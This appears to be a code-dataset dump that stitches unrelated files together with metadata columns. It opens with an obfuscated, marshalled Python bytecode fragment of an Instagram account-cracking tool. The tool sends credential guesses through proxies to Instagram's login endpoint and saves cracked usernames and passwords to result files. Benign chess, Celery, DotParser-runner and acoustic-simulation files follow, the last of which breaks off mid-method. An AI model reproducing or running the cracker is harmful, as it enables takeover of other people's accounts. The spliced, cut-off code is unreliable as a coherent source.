x00\x00__init__\x14\x00\x00\x00sH\x00\x00\x00\x00\x01\n\x01\n\x01\x03\x01\x0c\x01\x0c\x01\n\x01\n\x01\x11\x01\x03\x01\n\x01\n\x01\x05\x01\x0e\x02!\x01\x12\x01\x18\x01\x06\x01\t\x01\r\x01\x18\x01\x0c\x01\x12\x01\x10\x01\x13\x01\x13\x01\x03\x01\x18\x01\x12\x02\n\x01\r\x01\x11\x01\x03\x01\x08\x01\r\x01\x0e\x01c\x01\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00C\x00\x00\x00s0\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00}\x02\x00t\x00\x00j\x01\x00|\x01\x00|\x02\x00g\x02\x00t\x00\x00j\x02\x00d\x03\x00k\x02\x00\x19\x83\x01\x00\x01d\x00\x00S(\x04\x00\x00\x00Nt\x05\x00\x00\x00clearR\x06\x00\x00\x00t\x02\x00\x00\x00nt(\x03\x00\x00\x00R\t\x00\x00\x00R\n\x00\x00\x00t\x04\x00\x00\x00name(\x03\x00\x00\x00R \x00\x00\x00t\x05\x00\x00\x00linuxt\x07\x00\x00\x00windows(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x06\x00\x00\x00;\x00\x00\x00s\x06\x00\x00\x00\x00\x01\x06\x01\x06\x01c\x02\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00C\x00\x00\x00s\x0b\x00\x00\x00|\x00\x00j\x00\x00|\x01\x00\x19S(\x01\x00\x00\x00N(\x01\x00\x00\x00R\x11\x00\x00\x00(\x02\x00\x00\x00R \x00\x00\x00t\x03\x00\x00\x00num(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x14\x00\x00\x00@\x00\x00\x00s\x02\x00\x00\x00\x00\x01c\x01\x00\x00\x00\x06\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x81\x00\x00\x00d\x01\x00}\x01\x00d\x02\x00d\x03\x00d\x04\x00d\x05\x00d\x06\x00d\x07\x00g\x06\x00}\x02\x00d\x08\x00}\x03\x00xV\x00t\x00\x00|\x03\x00j\x01\x00d\t\x00\x83\x01\x00\x83\x01\x00D]?\x00\\\x02\x00}\x04\x00}\x05\x00t\x02\x00j\x03\x00j\x04\x00d\n\x00t\x05\x00j\x06\x00|\x02\x00\x83\x01\x00|\x05\x00|\x01\x00f\x03\x00\x16\x83\x01\x00\x01t\x07\x00j\x08\x00d\x0b\x00\x83\x01\x00\x01q:\x00Wd\x00\x00S(\x0c\x00\x00\x00Ns\x04\x00\x00\x00\x1b[0mi$\x00\x00\x00i \x00\x00\x00i"\x00\x00\x00i#\x00\x00\x00i\x1f\x00\x00\x00i%\x00\x00\x00s?\x02\x00\x00\n \xe2\x95\xa6\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\xa6\xe2\x95\x97\xe2\x95\x94\xe2\x95\x90\xe2\x95\x97\xe2\x95\x94\xe2\x95\x97\xe2\x95\x94 \n \xe2\x95\xa0\xe2\x95\xa6\xe2\x95\x9d\xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3 \xe2\x95\x91\xe2\x95\x91\xe2\x95\x91\xe2\x95\xa3 \xe2\x95\x91\xe2\x95\x91\xe2\x95\x91 \n \xe2\x95\xa9\xe2\x95\x9a\xe2\x95\x90\xe2\x95\xa9 \xe2\x95\xa9\xe2\x95\x90\xe2\x95\xa9\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x9d\xe2\x95\x9d\xe2\x95\x9a\xe2\x95\x9d \n \xe2\x95\xa6\xe2\x94\x8c\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\xac\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90 \xe2\x95\xa6 \xe2\x95\xa6\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\x8c\xe2\x94\x80\xe2\x94\x90\xe2\x94\xac\xe2\x94\x8c\xe2\x94\x80\n \xe2\x95\x91\xe2\x94\x82\xe2\x94\x82\xe2\x94\x82\xe2\x94\x94\xe2\x94\x80\xe2\x94\x90 \xe2\x94\x82 \xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4 \xe2\x95\xa0\xe2\x95\x90\xe2\x95\xa3\xe2\x94\x9c\xe2\x94\x80\xe2\x94\xa4\xe2\x94\x82 \xe2\x94\x9c\xe2\x94\xb4\xe2\x94\x90\n \xe2\x95\xa9\xe2\x94\x98\xe2\x94\x94\xe2\x94\x98\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98 \xe2\x94\xb4 \xe2\x94\xb4 \xe2\x94\xb4 \xe2\x95\xa9 \xe2\x95\xa9\xe2\x94\xb4 \xe2\x94\xb4\xe2\x94\x94\xe2\x94\x80\xe2\x94\x98\xe2\x94\xb4 \xe2\x94\xb4\n Fb: Raden Gozal MAMIHCREW.CF \n \n GREETS > \xe2\x95\x91 BHCT \xe2\x95\x91 IES \xe2\x95\x91 ICT \xe2\x95\x91 BCC \xe2\x95\x91 And You \xe2\x95\x91 \n s\x01\x00\x00\x00\ns\x0c\x00\x00\x00\x1b[1;%dm%s%s\ng\x9a\x99\x99\x99\x99\x99\xa9?(\t\x00\x00\x00t\t\x00\x00\x00enumerateR\x15\x00\x00\x00R\x0b\x00\x00\x00t\x06\x00\x00\x00stdoutt\x05\x00\x00\x00writet\x06\x00\x00\x00randomt\x06\x00\x00\x00choiceR\x1c\x00\x00\x00R\x1d\x00\x00\x00(\x06\x00\x00\x00R \x00\x00\x00R-\x00\x00\x00t\x06\x00\x00\x00colorsR#\x00\x00\x00t\x01\x00\x00\x00Nt\x04\x00\x00\x00line(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x07\x00\x00\x00C\x00\x00\x00s\x0c\x00\x00\x00\x00\x01\x06\x01\x18\x0c\x06\x01"\x01&\x01c\x04\x00\x00\x00\x07\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xe6\x00\x00\x00i\r\x00d\x01\x00d\x02\x006d\x03\x00d\x04\x006d\x05\x00d\x06\x006d\x07\x00d\x08\x006d\t\x00d\n\x006d\x0b\x00d\x0c\x006d\r\x00d\x0e\x006d\x0f\x00d\x10\x006d\x11\x00d\x12\x006d\x13\x00d\x14\x006d\r\x00d\x15\x006d\r\x00d\x16\x006d\x17\x00d\x18\x006}\x04\x00i\x02\x00|\x01\x00d\x19\x006|\x02\x00d\x1a\x006}\x05\x00|\x03\x00j\x00\x00d\x1b\x00\x19|\x04\x00d\x0e\x00<d\x1c\x00j\x01\x00|\x03\x00j\x00\x00d\x1d\x00\x19|\x03\x00j\x00\x00d\x1b\x00\x19\x83\x02\x00|\x04\x00d\x16\x00<t\x02\x00d\x1e\x00t\x03\x00|\x05\x00d\x19\x00\x19\x83\x01\x00\x17t\x03\x00|\x05\x00d\x1a\x00\x19\x83\x01\x00\x17\x83\x01\x00}\x06\x00|\x06\x00|\x04\x00d\x15\x00<|\x04\x00|\x05\x00f\x02\x00S(\x1f\x00\x00\x00Ns\x11\x00\x00\x00www.instagram.comt\x04\x00\x00\x00HostsD\x00\x00\x00Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0s\n\x00\x00\x00User-Agents\x03\x00\x00\x00*/*t\x06\x00\x00\x00Accepts\x0e\x00\x00\x00en-US,en;q=0.5s\x0f\x00\x00\x00Accept-Languages\x11\x00\x00\x00gzip, deflate, brs\x0f\x00\x00\x00Accept-Encodings\x1a\x00\x00\x00https://www.instagram.com/t\x07\x00\x00\x00Referert\x00\x00\x00\x00s\x0b\x00\x00\x00X-CSRFTokent\x01\x00\x00\x001s\x10\x00\x00\x00X-Instagram-AJAXs!\x00\x00\x00application/x-www-form-urlencodeds\x0c\x00\x00\x00Content-Typet\x0e\x00\x00\x00XMLHttpRequests\x10\x00\x00\x00X-Requested-Withs\x0e\x00\x00\x00Content-Lengtht\x06\x00\x00\x00Cookies\n\x00\x00\x00keep-alivet\n\x00\x00\x00Connectiont\x08\x00\x00\x00usernameR)\x00\x00\x00t\t\x00\x00\x00csrftokens)\x00\x00\x00mid={}; csrftoken={}; ig_pr=1; ig_vw=1366t\x03\x00\x00\x00midi\x13\x00\x00\x00(\x04\x00\x00\x00t\x07\x00\x00\x00cookiest\x06\x00\x00\x00formatR\x19\x00\x00\x00R\x13\x00\x00\x00(\x07\x00\x00\x00R \x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00t\x04\x00\x00\x00sesst\x07\x00\x00\x00headerst\x05\x00\x00\x00datast\x0b\x00\x00\x00lenthofData(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x06\x00\x00\x00HeaderV\x00\x00\x00s*\x00\x00\x00\x00\x01\x03\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\x07\x01\n\x02\x14\x01\x11\x01\x10\x01\x14\x01(\x01\n\x01c\x04\x00\x00\x00\x0b\x00\x00\x00\n\x00\x00\x00C\x00\x00\x00s+\x02\x00\x00y\xfc\x01i\x01\x00|\x03\x00d\x01\x006}\x04\x00t\x00\x00j\x01\x00d\x02\x00d\x03\x00|\x04\x00d\x04\x00d\x05\x00\x83\x01\x02}\x05\x00t\x00\x00j\x02\x00\x83\x00\x00}\x06\x00|\x00\x00j\x03\x00|\x01\x00t\x04\x00|\x02\x00\x83\x01\x00|\x05\x00\x83\x03\x00\\\x02\x00}\x07\x00}\x08\x00|\x06\x00j\x05\x00d\x06\x00d\x07\x00|\x07\x00d\x08\x00|\x08\x00d\x03\x00|\x04\x00d\x04\x00d\x05\x00\x83\x01\x04}\t\x00d\t\x00|\t\x00j\x06\x00k\x06\x00r\xe3\x00t\x07\x00d\n\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\r\x00\x17GHt\x08\x00d\x0e\x00d\x0f\x00\x83\x02\x00\x8f \x00}\n\x00|\n\x00j\t\x00|\x01\x00d\x0c\x00\x17|\x02\x00\x17d\x10\x00\x17\x83\x01\x00\x01Wd\x00\x00QXn\x18\x01d\x11\x00|\t\x00j\x06\x00k\x06\x00rv\x01d\x12\x00|\x03\x00\x17d\x13\x00\x17GHy7\x00|\x00\x00j\n\x00d\x14\x00\x17|\x00\x00_\n\x00|\x00\x00j\x0b\x00|\x01\x00|\x02\x00t\x04\x00|\x00\x00j\x0c\x00|\x00\x00j\n\x00\x19\x83\x01\x00\x83\x03\x00\x01Wq\xfb\x01\x01\x01\x01|\x00\x00j\n\x00d\x15\x00\x18|\x00\x00_\n\x00|\x00\x00j\x0b\x00|\x01\x00|\x02\x00t\x04\x00|\x00\x00j\x0c\x00|\x00\x00j\n\x00\x19\x83\x01\x00\x83\x03\x00\x01q\xfb\x01Xn\x85\x00d\x16\x00|\t\x00j\x06\x00k\x06\x00r\xda\x01t\r\x00d\x17\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\x18\x00\x17GHt\x08\x00d\x19\x00d\x0f\x00\x83\x02\x00\x8f \x00}\n\x00|\n\x00j\t\x00|\x01\x00d\x0c\x00\x17|\x02\x00\x17d\x10\x00\x17\x83\x01\x00\x01Wd\x00\x00QXn!\x00t\x0e\x00d\x17\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\x1a\x00\x17GHWn(\x00\x01\x01\x01t\x0e\x00d\x17\x00\x17|\x03\x00\x17d\x0b\x00\x17|\x01\x00\x17d\x0c\x00\x17|\x02\x00\x17d\x1a\x00\x17GHn\x01\x00Xd\x00\x00S(\x1b\x00\x00\x00Nt\x04\x00\x00\x00https\x19\x00\x00\x00https://www.instagram.comt\x07\x00\x00\x00proxiest\x07\x00\x00\x00timeouti\n\x00\x00\x00s.\x00\x00\x00https://www.instagram.com/accounts/login/ajax/RI\x00\x00\x00t\x04\x00\x00\x00datas\x14\x00\x00\x00authenticated": trues\x1e\x00\x00\x00 [+] Sedang Di Hack \xe2\x95\x91RG\xe2\x95\x91 s\x08\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 R\x03\x00\x00\x00s\x1a\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 Berhasil Di Hack !s\x0b\x00\x00\x00results.txtt\x01\x00\x00\x00as\x01\x00\x00\x00\ns.\x00\x00\x00Please wait a few minutes before you try againt\x01\x00\x00\x00 s"\x00\x00\x00 Ip Anda Terbanned Segera Ganti...i\x01\x00\x00\x00i\x02\x00\x00\x00t\x13\x00\x00\x00checkpoint_requireds\x1d\x00\x00\x00 [+] Sedang Di Hack \xe2\x95\x91RG\xe2\x95\x91 s"\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 Berhasil Namu CheckPoint !s\x16\x00\x00\x00results_NeedVerfiy.txts\x0f\x00\x00\x00 \xe2\x95\x91\xe2\x95\x91 gagal !(\x0f\x00\x00\x00t\x08\x00\x00\x00requestst\x03\x00\x00\x00gett\x07\x00\x00\x00sessionRL\x00\x00\x00R\x19\x00\x00\x00t\x04\x00\x00\x00postt\x04\x00\x00\x00textt\x01\x00\x00\x00gR\x0e\x00\x00\x00R5\x00\x00\x00R\x12\x00\x00\x00R\x18\x00\x00\x00R\x11\x00\x00\x00t\x01\x00\x00\x00yt\x01\x00\x00\x00c(\x0b\x00\x00\x00R \x00\x00\x00R(\x00\x00\x00R)\x00\x00\x00t\x06\x00\x00\x00proxyzR\'\x00\x00\x00t\x07\x00\x00\x00HeddataRH\x00\x00\x00RI\x00\x00\x00RJ\x00\x00\x00t\x03\x00\x00\x00GoTR#\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x18\x00\x00\x00n\x00\x00\x00s4\x00\x00\x00\x00\x01\x03\x01\r\x01\x1b\x01\x0c\x01!\x01\x18\x01\x0f\x01\x0f\x01!\x01\x12\x01"\x01\x0f\x01\r\x01\x03\x01\x10\x01\'\x01\x03\x01\x10\x01*\x01\x0f\x01!\x01\x12\x01"\x02%\x01\x03\x01(\x08\x00\x00\x00t\x08\x00\x00\x00__name__t\n\x00\x00\x00__module__R,\x00\x00\x00R\x06\x00\x00\x00R\x14\x00\x00\x00R\x07\x00\x00\x00RL\x00\x00\x00R\x18\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>R\x01\x00\x00\x00\x13\x00\x00\x00s\x0c\x00\x00\x00\x06\x01\t\'\t\x05\t\x03\t\x13\t\x18(\x14\x00\x00\x00RT\x00\x00\x00R\x0b\x00\x00\x00R\x16\x00\x00\x00R\x1c\x00\x00\x00R\t\x00\x00\x00R6\x00\x00\x00R\x00\x00\x00\x00R\x19\x00\x00\x00t\x07\x00\x00\x00versiont\x0c\x00\x00\x00CheckVersionR\x02\x00\x00\x00RY\x00\x00\x00RZ\x00\x00\x00t\x01\x00\x00\x00bt\x01\x00\x00\x00mR[\x00\x00\x00t\x01\x00\x00\x00wt\x02\x00\x00\x00rrt\x06\x00\x00\x00objectR\x01\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x07\x00\x00\x00<febry>t\x08\x00\x00\x00<module>\x03\x00\x00\x00s\x18\x00\x00\x00H\x01\x10\x01\x0f\x02\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x01\x06\x05\x16x'))
| 2,947
| 14,659
| 0.746793
| 3,237
| 14,735
| 3.391103
| 0.116157
| 0.278218
| 0.127904
| 0.07871
| 0.499043
| 0.411861
| 0.30491
| 0.270292
| 0.224014
| 0.21545
| 0
| 0.3894
| 0.019138
| 14,735
| 4
| 14,660
| 3,683.75
| 0.370096
| 0.0038
| 0
| 0
| 0
| 2.5
| 0.443824
| 0.406554
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.5
| 0.5
| 0
| 0.5
| 0.5
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 1
|
0
| 12
|
e8ff15ac6ff159d1488f4c4cfd848cfb2cc81dfe
| 79
|
py
|
Python
|
chess_engine/__init__.py
|
foo290/Ai-ChessEngine
|
2dd897dd356e8e63d52bc50d239752598b2d359b
|
[
"MIT"
] | null | null | null |
chess_engine/__init__.py
|
foo290/Ai-ChessEngine
|
2dd897dd356e8e63d52bc50d239752598b2d359b
|
[
"MIT"
] | null | null | null |
chess_engine/__init__.py
|
foo290/Ai-ChessEngine
|
2dd897dd356e8e63d52bc50d239752598b2d359b
|
[
"MIT"
] | null | null | null |
from chess_engine.engine import GameState
from chess_engine.moves import Move
| 19.75
| 41
| 0.860759
| 12
| 79
| 5.5
| 0.583333
| 0.272727
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.113924
| 79
| 3
| 42
| 26.333333
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
331a29104af17d147f666d6ef4db1df4ffcc7ff2
| 154
|
py
|
Python
|
tools/dashboard/dashboardserver/run_celery.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | 15
|
2015-03-12T12:15:41.000Z
|
2021-12-20T17:53:24.000Z
|
tools/dashboard/dashboardserver/run_celery.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | 44
|
2015-01-07T09:22:05.000Z
|
2017-01-31T22:44:21.000Z
|
tools/dashboard/dashboardserver/run_celery.py
|
zstars/weblabdeusto
|
09bd9d93d483671bca67ee5c70a9c412eb5d352f
|
[
"BSD-2-Clause"
] | 22
|
2015-01-13T13:55:48.000Z
|
2021-12-16T17:07:00.000Z
|
import sys
from checks import celery_app
from checks import archimedes
celery_app.config_from_object("config")
celery_app.worker_main(sys.argv + ["-B"])
| 22
| 41
| 0.805195
| 24
| 154
| 4.916667
| 0.541667
| 0.228814
| 0.271186
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.097403
| 154
| 7
| 41
| 22
| 0.848921
| 0
| 0
| 0
| 0
| 0
| 0.051613
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
683a58066d4f8cd37fd34753fee5cc19dcb62f95
| 5,617
|
py
|
Python
|
scriptStarter.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
scriptStarter.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
scriptStarter.py
|
johannes-schuetze/ALTO-framework-sim
|
7a8d1df549188684ad3636434ccd6cf064e82c4f
|
[
"MIT"
] | null | null | null |
#! /usr/bin/python
#Master-Thesis dot parsing framework
#Date: 17.11.2014
#Author: Bruno-Johannes Schuetze
#uses python 2.7.6
#script starts the complete process to generate Data for the purpose of this thesis
#The DotParser.py is started 6 times with each GER and USA topologies (Level 0 - 6) and 4 times with the 6D_HC topology
#
#usage: python scriptStarter.py
import subprocess
print "#####################################################################"
print "##STARTING GER NETWORK###############################################"
print "#####################################################################"
#reset counter
count = 0
######0
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
print graphName
graphPath = "Networks/FINAL/"+graphName+".dot"
print graphPath
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######1
print "starting:GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######2
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######3
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######4
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######5
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######6
print "starting: GER Level"+str(count)
graphName = "GER_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
print "done.\n"
print "#####################################################################"
print "############################STARTING USA NETWORK#####################"
print "#####################################################################"
#reset counter
count = 0
######0
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
print graphName
graphPath = "Networks/FINAL/"+graphName+".dot"
print graphPath
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######1
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######2
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######3
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######4
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######5
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######6
print "starting: USA Level"+str(count)
graphName = "USA_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
print "done.\n"
print "#######################################################################"
print "##########################################STARTING 6D HC NETWORK#######"
print "#######################################################################"
#reset counter
count = 0
######0
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
print graphName
graphPath = "Networks/FINAL/"+graphName+".dot"
print graphPath
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######1
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######2
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######3
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
count = count +1
print "done.\n"
######4
print "starting: 6D HC Level"+str(count)
graphName = "6D_HC_Level"+str(count)
graphPath = "Networks/FINAL/"+graphName+".dot"
subprocess.call(["./DotParser.py",graphPath, graphName])
print "#####################################################################"
print "################################################################DONE#"
print "#####################################################################"
| 32.468208
| 119
| 0.614741
| 661
| 5,617
| 5.186082
| 0.1059
| 0.088681
| 0.144107
| 0.121937
| 0.901109
| 0.901109
| 0.901109
| 0.901109
| 0.901109
| 0.873979
| 0
| 0.012641
| 0.084565
| 5,617
| 172
| 120
| 32.656977
| 0.654026
| 0.071925
| 0
| 0.962121
| 1
| 0
| 0.420287
| 0.155888
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.007576
| null | null | 0.416667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 10
|
6850781e081f0d83e5ae5f0bec6912fe91504143
| 30,693
|
py
|
Python
|
pyPLANES/pw/pw_interfaces.py
|
matael/pyPLANES
|
7f591090446303884c9a3d049e42233efae0b7f4
|
[
"MIT"
] | null | null | null |
pyPLANES/pw/pw_interfaces.py
|
matael/pyPLANES
|
7f591090446303884c9a3d049e42233efae0b7f4
|
[
"MIT"
] | null | null | null |
pyPLANES/pw/pw_interfaces.py
|
matael/pyPLANES
|
7f591090446303884c9a3d049e42233efae0b7f4
|
[
"MIT"
] | 1
|
2020-12-15T16:24:08.000Z
|
2020-12-15T16:24:08.000Z
|
#! /usr/bin/env python
# -*- coding:utf8 -*-
#
# pw_interfaces.py
#
# This file is part of pyplanes, a software distributed under the MIT license.
# For any question, please contact one of the authors cited below.
#
# Copyright (c) 2020
# Olivier Dazel <olivier.dazel@univ-lemans.fr>
# Mathieu Gaborit <gaborit@kth.se>
# Peter Göransson <pege@kth.se>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
import numpy as np
from numpy import sqrt
from pyPLANES.utils.io import load_material
from pyPLANES.pw.pw_polarisation import fluid_waves_TMM
class PwInterface():
"""
Interface for Plane Wave Solver
"""
def __init__(self, layer1=None, layer2=None):
self.layers = [layer1, layer2]
def update_M_global(self, M, i_eq):
pass
def update_Omega(self, Om):
pass
def update_frequency(self, omega, kx):
pass
class FluidFluidInterface(PwInterface):
"""
Fluid-fluid interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Fluid-fluid interface"
return out
def update_frequency(self, omega, kx):
pass
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam[0]*self.layers[1].d)
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[0, 1]
M[i_eq, self.layers[1].dofs[0]] = -self.layers[1].SV[0, 0]
M[i_eq, self.layers[1].dofs[1]] = -self.layers[1].SV[0, 1]*delta_1
i_eq += 1
M[i_eq, self.layers[0].dofs[0]] = self.layers[0].SV[1, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = self.layers[0].SV[1, 1]
M[i_eq, self.layers[1].dofs[0]] = -self.layers[1].SV[1, 0]
M[i_eq, self.layers[1].dofs[1]] = -self.layers[1].SV[1, 1]*delta_1
i_eq += 1
return i_eq
def transfert(self, Om):
return Om.reshape(2,1), np.eye(1)
class FluidPemInterface(PwInterface):
"""
Fluid-PEM interface
"""
def __init__(self, layer1=None, layer2=None):
super().__init__(layer1,layer2)
def __str__(self):
out = "\t Fluid-PEM interface"
return out
def transfert(self, Om):
a = -np.array([
[Om[0,1],Om[0,2]],
[Om[3,1],Om[3,2]]
])
Tau = np.dot(np.linalg.inv(a), np.array([[Om[0,0]], [Om[3,0]]]))
Tau_tilde = np.concatenate([np.eye(1),Tau])
Omega_moins = np.array([[Om[2,0]], [Om[4,0]]]) + np.dot(np.array([[Om[2,1], Om[2,2]], [Om[4,1], Om[4,2]]]), Tau)
return Omega_moins.reshape(2,1), Tau_tilde
def update_M_global(self, M, i_eq):
delta_0 = np.exp(self.layers[0].lam[0]*self.layers[0].d)
delta_1 = np.exp(self.layers[1].lam*self.layers[1].d)
SV_1 = self.layers[0].SV
SV_2 = self.layers[1].SV
M[i_eq, self.layers[0].dofs[0]] = SV_1[0, 0]*delta_0
M[i_eq, self.layers[0].dofs[1]] = SV_1[0, 1]
M[i_eq, self.layers[1].dofs[0]] = -SV_2[2, 0]
M[i_eq, self.layers[1].dofs[1]] = -SV_2[2, 1]
M[i_eq, self.layers[1].dofs[2]] = -SV_2[2, 2]
